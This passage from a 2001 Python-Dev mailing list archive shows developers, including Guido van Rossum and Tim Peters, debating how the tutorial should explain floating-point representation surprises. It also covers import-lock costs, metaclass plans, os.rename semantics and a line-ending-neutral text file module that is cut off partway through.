well-defined (the last digit or so can and will vary across boxes). I can certainly explain that this is so, and even why, but unsure the tutorial is the right place for it. In any case the tutorial shouldn't be giving examples whose output is platform-dependent. For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour the tutorial for all such cases? Or we could put the attached function at the start of the tutorial and use it to format floats: >>> f2ds(10 * 3.14) '31400000000000002131628207280300557613372802734375e-48' >>> I'm sure newbies would feel assured by that . def f2ds(x): """Return float x as exact decimal string. The string is of the form: "-", if and only if x is < 0. One or more decimal digits. The last digit is not 0 unless x is 0. "e" The exponent, a (possibly signed) integer """ import math # XXX ignoring infinities and NaNs for now. if x == 0: return "0e0" sign = "" if x < 0: sign = "-" x = -x f, e = math.frexp(x) assert 0.5 <= f < 1.0 # x = f * 2**e exactly # Suck up CHUNK bits at a time; 28 is enough so that we suck # up all bits in 2 iterations for all known binary double- # precision formats, and small enough to fit in an int. CHUNK = 28 top = 0L # invariant: x = (top + f) * 2**e exactly while f: f = math.ldexp(f, CHUNK) digit = int(f) assert digit >> CHUNK == 0 top = (top << CHUNK) | digit f -= digit assert 0.0 <= f < 1.0 e -= CHUNK assert top > 0 # Now x = top * 2**e exactly. Get rid of trailing 0 bits if e < 0 # (purely to increase efficiency a little later -- this loop can # be removed without changing the result). while e < 0 and top & 1 == 0: top >>= 1 e += 1 # Transform this into an equal value top' * 10**e'. if e > 0: top <<= e e = 0 elif e < 0: # Exact is top/2**-e. Multiply top and bottom by 5**-e to # get top*5**-e/10**-e = top*5**-e * 10**e top *= 5L**-e # Nuke trailing (decimal) zeroes. while 1: assert top > 0 newtop, rem = divmod(top, 10L) if rem: break top = newtop e += 1 return "%s%de%d" % (sign, top, e) From guido@digicool.com Mon May 21 20:02:43 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 15:02:43 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT." References: Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com> > Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: > so long as we rely on the platform C to format floats, the output isn't > well-defined (the last digit or so can and will vary across boxes). I can't check right now, but I thought that this was pretty consistent across some common platforms? > I can certainly explain that this is so, and even why, but unsure > the tutorial is the right place for it. In any case the tutorial > shouldn't be giving examples whose output is platform-dependent. > For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour > the tutorial for all such cases? Are you serious? This is something that the newbie wou is in the least bit adventurous will run into anyway, so I don't think that not talking about this at all in the tutorial is fair or helpful. That just perpetuates the questions from newbies about "floating point is broken" -- since none of the tutorial examples prepare them for this. Since this is behavior that is ordinarily observed and perpetually perplexing, I think it *must* be treated in the tutorial. The tutorial doesn't have to have the full explanation -- maybe it's enough to say something like ``due to round-off errors you will sometimes see inexact results like 31.400000000000002; don't worry about this, you can use str() or "%g" (but not round()!) to strip redundant precision, and here's a URL for more info.'' Or maybe the full story can be an appendix. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz@rahul.net Mon May 21 21:09:04 2001 From: aahz@rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:09:04 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net> Guido van Rossum wrote: > > Or maybe the full story can be an appendix. Or maybe Decimal should go in the standard distribution? What kind of deadline do I have for finishing that to go into 2.2? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido@digicool.com Mon May 21 21:35:10 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:35:10 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT." <20010521200904.05CAE99C81@waltz.rahul.net> References: <20010521200904.05CAE99C81@waltz.rahul.net> Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com> > > Or maybe the full story can be an appendix. > > Or maybe Decimal should go in the standard distribution? What kind of > deadline do I have for finishing that to go into 2.2? Adding Decimal to the distribution is fine. But using it by default for floating point literals and other floating point results is a different story. The PEP about that hasn't really been discussed enough to make a decision, but a conservative estimate is that this change won't be made in 2.2. So Decimal doesn't solve the problem the tutorial has. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz@rahul.net Mon May 21 21:42:15 2001 From: aahz@rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:42:15 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM Message-ID: <20010521204215.F216699C81@waltz.rahul.net> Guido van Rossum wrote: > >>> Or maybe the full story can be an appendix. >> >> Or maybe Decimal should go in the standard distribution? What kind of >> deadline do I have for finishing that to go into 2.2? > > Adding Decimal to the distribution is fine. But using it by default > for floating point literals and other floating point results is a > different story. The PEP about that hasn't really been discussed > enough to make a decision, but a conservative estimate is that this > change won't be made in 2.2. So Decimal doesn't solve the problem the > tutorial has. Wasn't thinking of going quite that far, only changing the tutorial to say something like, "If you want speed, use the hardware FP (which is directly supported by Python's floating literals); if you want accuracy, use Decimal." (Or FixedPoint, which is already in the distribution.) The full story needn't go in the Appendix; we can simply refer people to Cowlishaw and Kahan. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido@digicool.com Mon May 21 21:57:08 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:57:08 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT." <20010521204215.F216699C81@waltz.rahul.net> References: <20010521204215.F216699C81@waltz.rahul.net> Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com> [Aahz] > >>> Or maybe the full story can be an appendix. > >> > >> Or maybe Decimal should go in the standard distribution? What kind of > >> deadline do I have for finishing that to go into 2.2? [Guido] > > Adding Decimal to the distribution is fine. But using it by default > > for floating point literals and other floating point results is a > > different story. The PEP about that hasn't really been discussed > > enough to make a decision, but a conservative estimate is that this > > change won't be made in 2.2. So Decimal doesn't solve the problem the > > tutorial has. [Aahz] > Wasn't thinking of going quite that far, only changing the tutorial to > say something like, "If you want speed, use the hardware FP (which is > directly supported by Python's floating literals); if you want accuracy, > use Decimal." (Or FixedPoint, which is already in the distribution.) > The full story needn't go in the Appendix; we can simply refer people to > Cowlishaw and Kahan. I think that most people don't care about either speed or accuracy, but (being Python users) everybody cares about convenience, and convenience is using the built-in floating point literals. (Also, most other modules returning or using floating point numbers use binary floating point, e.g. the time module and of course the math module.) As long as the built-in literals are binary floating point, they are what 99% of the code uses, so we need to explain the pitfalls. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake@cj42289-a.reston1.va.home.com Mon May 21 22:47:35 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Mon, 21 May 2001 17:47:35 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental updates to the Python 2.2 documentation. From tim@digicool.com Mon May 21 22:57:22 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 21 May 2001 17:57:22 -0400 Subject: [Python-Dev] FP vs. tutorial Message-ID: Let's get some errors cleared up first: + FixedPoint is not in the distribution. + There is no PEP for Decimal. + Decimal f.p. is not more accurate than binary f.p. In fact, it's provably worse (but not by much). For the rest, + Yes, I'm serious about not including tutorial examples with platform-dependent output, unless they're explicitly meant to illustrate non-portable code. + Specific small examples notwithstanding, there is no uniformity across platforms in the last digit or so, because not even the IEEE- 754 standard requires that (while C is much sloppier than 754), and vendors generally don't implement anything better than the minimum necessary when it comes to f.p. (Sun is a notable exception). + Happy to add text explaining the existence of surprises, and providing a URL. Do the floating-point morons on Python-Dev find this one comprehensible?: http://www.lahey.com/float.htm From guido@digicool.com Mon May 21 23:33:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 18:33:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT." References: Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com> > + Yes, I'm serious about not including tutorial examples with > platform-dependent output, unless they're explicitly meant to > illustrate non-portable code. Sure. Most examples can be rewritten to avoid platform-dependent output. But there should be one section on floating-point inaccuracies that shows a few of the kind of things you can expect on a typical platform, and 1.1 -> 1.1000000000000001 is pretty common. > + Specific small examples notwithstanding, there is no uniformity > across platforms in the last digit or so, because not even the IEEE- > 754 standard requires that (while C is much sloppier than 754), and > vendors generally don't implement anything better than the minimum > necessary when it comes to f.p. (Sun is a notable exception). So we'll have to add something like "the actual inexact output you see may differ from the inexact output in this example". > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I was thinking more of immortalizing this one: http://www.python.org/cgi-bin/moinmoin/RepresentationError This can serve as a nice self-contained section on f.p. surprises. --Guido van Rossum (home page: http://www.python.org/~guido/) From MarkH@ActiveState.com Tue May 22 00:06:39 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:06:39 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com> Message-ID: > > + Happy to add text explaining the existence of surprises, and > > providing a URL. Do the floating-point morons on Python-Dev > > find this one comprehensible?: Hey - I resemble that remark! > > http://www.lahey.com/float.htm I quite liked the tone of this note. The Python-dev morons probably could make good sense of this, but only due to the relentless persistence of a certain timbot. If not for Tim, I would have forgotten completely about binary floating point versus decimal floating point. IIRC, me and about 40 other guys were desperately trying to get the attention of the single CS female on the day that lecture was given. (Actually, that is a pretty safe bet - _all_ lectures were spent that way :) However, without a little additional background I doubt the masses would be able to get too far into this. As Tim has said a few times, most people wont care - they just want it to work! > I was thinking more of immortalizing this one: > > http://www.python.org/cgi-bin/moinmoin/RepresentationError IMO, this is a little worse. There is less "background". Eg, in almost the first paragraph we see: """ Rewriting 1 J --- ~= ---- 10 2**N """ And I went "huh? Where did j and N spring from?". Reading a bit further made it clear, but this document did seem a little impenetrable to floating point or maths newbies. It seems to me that the RepresentationError document was written for people with a decent background in maths - exactly the sort of people who _don't_ need such a document. Just-my-0.020000002-cents-worth ly, Mark. From jeremy@digicool.com Tue May 22 00:13:09 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Mon, 21 May 2001 19:13:09 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <15113.41221.839653.822246@slothrop.digicool.com> We looked at the SecondImport test case today. It's a good test case for programs that execute "import os" in a time-critical inner loop :-). The primary reason it is slower is the import lock that was added after 1.5.2. The benchmark, run in isolation, spends about 6 percent of its time in the locking code. Since it only spends about 20 percent of its time actually doing imports, this is a pretty substantial cost. It seems possible to eliminate some of the cost by using a special marker in sys.modules that means: "This is not a module, but it's being loaded by another thread." But Guido doesn't sound interested in optimizing programs with imports in inner loops. Jeremy From tim@digicool.com Tue May 22 00:20:16 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 21 May 2001 19:20:16 -0400 Subject: [Python-Dev] test_mailbox now fails on Windows Message-ID: Appears to be because new code uses os.link, which doesn't exist on Windows. BTW, test_urllib2.py is still failing on Windows (and has been for a couple of weeks). From michel@digicool.com Tue May 22 00:42:49 2001 From: michel@digicool.com (Michel Pelletier) Date: Mon, 21 May 2001 16:42:49 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Mark Hammond wrote: > > > + Happy to add text explaining the existence of surprises, and > > > providing a URL. Do the floating-point morons on Python-Dev > > > find this one comprehensible?: > > Hey - I resemble that remark! As they say in the south, "mah-self" > > > http://www.lahey.com/float.htm > > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. I liked the tone too, but it really goes into a lot of detail, there's this problem, and that one, oh and also *this* one and then there's *that* and the other thing, and after a while you get the impression that floating-point is for the insane. > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys were > desperately trying to get the attention of the single CS female on the day > that lecture was given. (Actually, that is a pretty safe bet - _all_ > lectures were spent that way :) The funny thing about that is we were in *Long Beach* (I assume you mean IPC9), if you wanted to see beautiful, scarcely clothed women in an acceptable public venue you woudn't have had to go far, and they would have probably had more interesting "significant bits" (it's none of anyones business where *I* was during the lectures ;). Someone on the Zope list proposed P4W (Python for Women). Poor, desperate souls. Obviously, P4E includes them too!! > > I was thinking more of immortalizing this one: > > > > http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. I agree. Equations should not be needed to explain this. -Michel From MarkH@ActiveState.com Tue May 22 00:47:06 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:47:06 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: > > The funny thing about that is we were in *Long Beach* (I > assume you mean IPC9), if you wanted to see beautiful, scarcely clothed Actually, I meant the computer science lectures all those years ago. Literally one female. And-not-much-has-changed ly, Mark. From guido@digicool.com Tue May 22 04:22:40 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:22:40 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000." References: Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com> Hi Alan, Thanks a lot for your input. I am cc'ing this reply to python-dev because I think my reply will be interesting for others. (Python-dev'ers: Alan expressed concern that introducing Smalltalk metaclasses would make Python unnecessarily complicated.) The way my thinking is currently going, it's not likely that Python will get a metaclass system similar to Smalltalk. However, unifying types and classes is useful for other reasons: please go to http://python.sourceforge.net/peps/ to read PEP 252 which explains how introspection can become simpler and more powerful by unifying the introspection mechanisms for types and classes. There will still be metaclasses, but the metaclasses will be less important than in Smalltalk. Class methods as commonly seen in Smalltalk are not high on my priority list, and the metaclass hierarchy won't be parallelling the regular class hierarchy. Instead, most metaclass programming will be done in C by programmers who want to implement alternative class policies. For example, the current class implementation gives each class a __dict__ for methods and class variables, and dynamically searches the class hierarchy for methods. An alternative inheritance policy could merge the __dict__ of the base class(es) with the __dict__ of the derived class at class declaration time: this would make method lookup a single dict lookup no matter how many levels of base classes are involved, at the cost of making classes less dynamic, because a change to a base class won't be seen in a derived class. A metaclass controls method lookup and class construction, and thus a different metaclass can be used to change this policy for selected class hierarchies without changing the default policy (which would be backwards incompatible). Other policies under control of a metaclass could include overriding hooks for getattr and setattr, alternative mechanisms to store instance variables (e.g. slot-based rather than dict-based), and so on. While I think I can make it possible to write metaclasses in pure Python (by subclassing types.TypeType), I expect that most metaprogramming will be done in C, for performance reasons and for maximum flexibility. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Tue May 22 04:55:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:55:26 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT." References: Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com> > [Guido] > > I would like to break this down by defining the mapping between cmp() > > and rich comparisons. [Tim] > Good idea! Followed by many nitpicking questions about what I meant. As a matter of process, I think it's better to try to channel instead of challenge me. I just don't seem to have the concentration necessary to come up with all the details needed to make this worthy of a language definition, and you do. If you want a BDFL proclamation on currently gray areas in the rules, or a reversal of what the current implementation does in some cases, please draft a definition with a few leading questions. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Tue May 22 05:02:18 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 22 May 2001 00:02:18 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Mark Hammond, on http://www.lahey.com/float.htm] > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. > > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys > were desperately trying to get the attention of the single CS female on > the day that lecture was given. (Actually, that is a pretty safe bet - > _all_ lectures were spent that way :) I remember guys like you. Well guess what? You ended up with a baby, while I'm known on two continents as the author of tabnanny.py. Ha! Revenge is a dish best eaten cold . > However, without a little additional background I doubt the masses would > be able to get too far into this. There's only so much you can say to unmotivated people who are also unwilling to learn. That's not my problem. Finding them a gentle intro from which they *could* learn isn't either, but typing a URL is easy enough that I don't mind. Here: I want to script MS Word with Python. I don't know COM and refuse to learn anything about it. I'd rather not install win32all either, and import statements confuse me. Why don't you make it easy for me? It's the same thing -- you can point them at what they need to learn if they're serious, else they're simply out of luck. [And on] >> http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. In one sense it's much worse: it's only trying to explain a single cause of fp surprises. OTOH, it explains it precisely while giving the reader the tools needed to do an exact analysis of any case of that particular class. The Lahey link touches on all the common sources of surprises, but leaves them fuzzy. > There is less "background". Eg, in almost the first paragraph we see: > > """ > Rewriting > 1 J > --- ~= ---- > 10 2**N > """ > > And I went "huh? Where did j and N spring from?". Reading a bit further > made it clear, but this document did seem a little impenetrable to > floating point or maths newbies. It did its job for them if it simply scared them <0.5 wink>. > It seems to me that the RepresentationError document was written for > people with a decent background in maths - There's nothing more complicated than integer division there. > exactly the sort of people who _don't_ need such a document. They actually do: regardless of math background, nothing about f.p. is obvious before studying f.p. as a subject in its own right. It's "not like" anything else, and in previous lives I spent a good chunk of my work time explaining the same stuff to doctorates. Mathematicians were actually the hardest audience at first, perhaps because they had the hardest time admitting they didn't already understand it; after getting beyond bruised professional pride, though, they were the easiest audience to bring up to speed. From tim@digicool.com Tue May 22 05:58:21 2001 From: tim@digicool.com (Tim Peters) Date: Tue, 22 May 2001 00:58:21 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Michel Pelletier, on http://www.lahey.com/float.htm] > I liked the tone too, but it really goes into a lot of detail, there's > this problem, and that one, oh and also *this* one and then there's > *that* and the other thing, and after a while you get the impression > that floating-point is for the insane. Using an unfamiliar power tool with sharp edges, and while blindfolded, is insane. [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > I agree. Equations should not be needed to explain this. There's exactly one equation on that page, saying that one ratio of two integers is approximately equal to another ratio of two integers. If that's too much for you, and you weren't satisfied with the *initial* hand-wavy explanation ("1/10 is not exactly representable as a binary fraction") either, then it's up to you to do better than the latter without actually saying anything useful : Q: Why is Python broken: >>> 0.1 0.10000000000000001 A: [your turn] From gward@python.net Tue May 22 14:41:57 2001 From: gward@python.net (Greg Ward) Date: Tue, 22 May 2001 09:41:57 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: ; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400 References: Message-ID: <20010522094157.A1245@gerg.ca> On 21 May 2001, Tim Peters said: > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I found this article more useful, interesting, and informative than whatever I learned about binary floating-point in my academic years. Good link, Tim. Two catches: * I can just barely follow the FORTRAN examples; I very much doubt the average Python newbie would have any more luck than me * I tried several of the FORTRAN examples in Python, and did not witness any of the gotchas they are meant to illustrate. Possibly it's just single-precision vs. double-precision difference, but Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 doesn't demonstrate the same gotchas as that article does. Greg -- Greg Ward - geek gward@python.net http://starship.python.net/~gward/ Ban the bomb -- save the world for conventional warfare. From skip@pobox.com (Skip Montanaro) Tue May 22 17:01:40 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Tue, 22 May 2001 11:01:40 -0500 Subject: [Python-Dev] type/class unification and ExtensionClass Message-ID: <15114.36196.4677.99240@beluga.mojam.com> I know Guido has recently been working on some of the type/class unification issues (PEPs 252 and 253). Will this affect ExtensionClass? In particular, will it go away or have to be reworked significantly for Python 2.2 or 2.3? The new PyGtk wrappers use the ExtensionClass module. I'm curious about how hard it would be to move away from ExtensionClass for these wrappers. My reading of PEP 253 suggests this shouldn't be too difficult. I'd ask Guido directly, but I figure other people on this list might also have useful input on the issue and/or be able to answer, saving him the time. At any rate, he will see it posted here just the same. Thx, Skip From guido@digicool.com Tue May 22 17:23:52 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 12:23:52 -0400 Subject: [Python-Dev] type/class unification and ExtensionClass In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT." <15114.36196.4677.99240@beluga.mojam.com> References: <15114.36196.4677.99240@beluga.mojam.com> Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com> > I know Guido has recently been working on some of the type/class unification > issues (PEPs 252 and 253). And I'm not done yet. :-) > Will this affect ExtensionClass? In particular, > will it go away or have to be reworked significantly for Python 2.2 or 2.3? Probably. Jim Fulton in particular asked me to work on this because he wants to phase out ExtensionClass. > The new PyGtk wrappers use the ExtensionClass module. I'm curious about how > hard it would be to move away from ExtensionClass for these wrappers. My > reading of PEP 253 suggests this shouldn't be too difficult. I don't think so either. > I'd ask Guido directly, but I figure other people on this list might also > have useful input on the issue and/or be able to answer, saving him the > time. At any rate, he will see it posted here just the same. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel@digicool.com Tue May 22 22:44:09 2001 From: michel@digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 14:44:09 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Tim Peters wrote: > [Michel Pelletier, on http://www.lahey.com/float.htm] > > I liked the tone too, but it really goes into a lot of detail, there's > > this problem, and that one, oh and also *this* one and then there's > > *that* and the other thing, and after a while you get the impression > > that floating-point is for the insane. > > Using an unfamiliar power tool with sharp edges, and while blindfolded, is > insane. I should have been more clear, I liked the first couple of paragraphs for their descriptions, and there is certainly nothing wrong with the document as it stands, but such an explanation would be a bit too lengthly and boring to a typical fifth grader or photoshop guru going through the Tutorial and dabbling in programming for the very first time. > [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > > > I agree. Equations should not be needed to explain this. > > There's exactly one equation on that page, saying that one ratio of two > integers is approximately equal to another ratio of two integers. Who was it that said every equation will halve your audience? I agree with that, the tutorial should try to be as broad and simple as possible. > If that's > too much for you, and you weren't satisfied with the *initial* hand-wavy > explanation ("1/10 is not exactly representable as a binary fraction") > either, then it's up to you to do better than the latter without actually > saying anything useful : The latter is fine, although I think the first document hand-waves better. -Michel From skip@pobox.com (Skip Montanaro) Tue May 22 22:54:42 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Tue, 22 May 2001 16:54:42 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform Message-ID: <15114.57378.887742.531145@beluga.mojam.com> Couldn't figure out why this message never generated any comment. Turns out it didn't reach the list because the host I sent it from (dynamic4.tttech.com) couldn't be resolved. I just noticed it in my errors mailbox and am sending it out again. ------------------------------------------------------------------------------ It was brought to my attention a week ago by a client that os.rename semantics differ between Unix and Windows. On Unix, if the destination file already exists it is silently deleted. On Windows, an exception is raised. I was able to verify this for Python 2.0 on Windows98. I assume nothing changed for 2.1, but I can't verify that. (Windows trashed my partition table and my Linux root partition while I was downloading 2.1. Consequently, I no longer run Windows. Take that, Bill...) I haven't checked the Mac yet (will do that when I get back to the US), but I think that os.rename should have the same semantics across all platforms. To the extent reasonably possible, I think this should also be true of other common functions exposed through the os module. On the (unsupportable) theory that to-date, more Python apps have been written and/or deployed on Unix-like systems and that where Windows apps are concerned, many developers will have added a thin wrapper to mimic the Unix semantics, I think less breakage would result if the Unix semantics were implemented in the Windows version. It appears that is what POSIX compliance would demand as well. Skip From fdrake@acm.org Tue May 22 22:55:29 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 17:55:29 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com> Michel Pelletier writes: > as it stands, but such an explanation would be a bit too lengthly and > boring to a typical fifth grader or photoshop guru going through the > Tutorial and dabbling in programming for the very first time. But that's not the audience the Python Tutorial is targetted to -- readers are expected to be essentially competant in at least one "3rd generation" language. Maybe a few will shy away from a simple equation, but not so many. Those who do would do well to shy away from FP as well. ;-) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Tue May 22 23:04:11 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 18:04:11 -0400 (EDT) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> skip@pobox.com writes: > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were I don't know whether there are more deployed Python apps on Unix than on Windows (and I've no good idea about how to find out), but I think unifying the semantics one way or the other is a good thing. Regardless of which set of semantics is chosen. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh@python.net Tue May 22 23:07:12 2001 From: mwh@python.net (Michael Hudson) Date: 22 May 2001 23:07:12 +0100 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)" References: Message-ID: Michel Pelletier writes: > Who was it that said every equation will halve your audience? It was Stephen Hawking's editor when he was preparing A Brief History Of Time (or at least, it gets mentioned in the preface; the advice may be older). Cheers, M. -- 7. It is easier to write an incorrect program than understand a correct one. -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html From jeremy@digicool.com Tue May 22 23:57:40 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Tue, 22 May 2001 18:57:40 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.61156.692322.674137@slothrop.digicool.com> >>>>> "MWH" == Michael Hudson writes: MWH> Michel Pelletier writes: >> Who was it that said every equation will halve your audience? MWH> It was Stephen Hawking's editor when he was preparing A Brief MWH> History Of Time (or at least, it gets mentioned in the preface; MWH> the advice may be older). There's a similar saw about excerpts of books in foreign languages. I believe I first read it in reference to Umberto Eco's Foucault's Pendulum, which starts with a full page of Hebrew. Jeremy From chrishbarker@home.net Wed May 23 00:21:01 2001 From: chrishbarker@home.net (Chris Barker) Date: Tue, 22 May 2001 16:21:01 -0700 Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line conversion? References: <20010414192445-r01010600-f8273ce6@213.84.27.177> Message-ID: <3B0AF45D.732126E6@home.net> This is a multi-part message in MIME format. --------------B9643430766B782E71A5BE98 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Just van Rossum wrote: > Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't > seem to help focussing on actual content... > > Just Just (or anyone else) Have you made any progress on this PEP? I'd like to see it happen, so if you havn't done it, I'll try to find the time to make a start on it myself. I have written a simple class that impliments a line-ending-neutral text file class. I wrote it because I have a need for it, and I thought it would be a reasonable prototype for any syntax and methods we might want to use in an actual implimentation. I doubt anyone would find the methods I used particularly clean or elegant (or fast) but it's the first thing I've come up with, and it seems to work. I've enclosed the module with this email. If that doesn't work, let me know and I'll put it on a website. -Chris -- Christopher Barker, Ph.D. ChrisHBarker@home.net --- --- --- http://members.home.net/barkerlohmann ---@@ -----@@ -----@@ ------@@@ ------@@@ ------@@@ Oil Spill Modeling ------ @ ------ @ ------ @ Water Resources Engineering ------- --------- -------- Coastal and Fluvial Hydrodynamics -------------------------------------- ------------------------------------------------------------------------ --------------B9643430766B782E71A5BE98 Content-Type: text/plain; charset=us-ascii; name="TextFile.py" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="TextFile.py" #!/usr/bin/env python """ TextFile.py : a module that provides a UniversalTextFile class, and a replacement for the native python "open" command that provides an interface to that class. It would usually be used as: from TextFile import open then you can use the new open just like the old one (with some added flags and arguments) or import TextFile file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize]) """ import os ## Re-map the open function _OrigOpen = open def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""): """ A new open function, that returns a regular python file object for the old calls, and returns a new nifty universal text file when required. This works just like the regular open command, except that a new flag and a new parameter has been added. Call: file = open(filename,flags = "",bufsize = -1, LineEndingType = ""): - filename is the name of the file to be opened - flags is a string of one letter flags, the same as the standard open command, plus a "t" for universal text file. - - "b" means binary file, this returns the standard binary file object - - "t" means universal text file - - "r" for read only - - "w" for write. If there is both "w" and "t" than the user can specify a line ending type to be used with the LineEndingType parameter. - - "a" means append to existing file - bufsize specifies the buffer size to be used by the system. Same as the regular open function - LineEndingType is used only for writing (and appending) files, to specify a non-native line ending to be written. - - The options are: 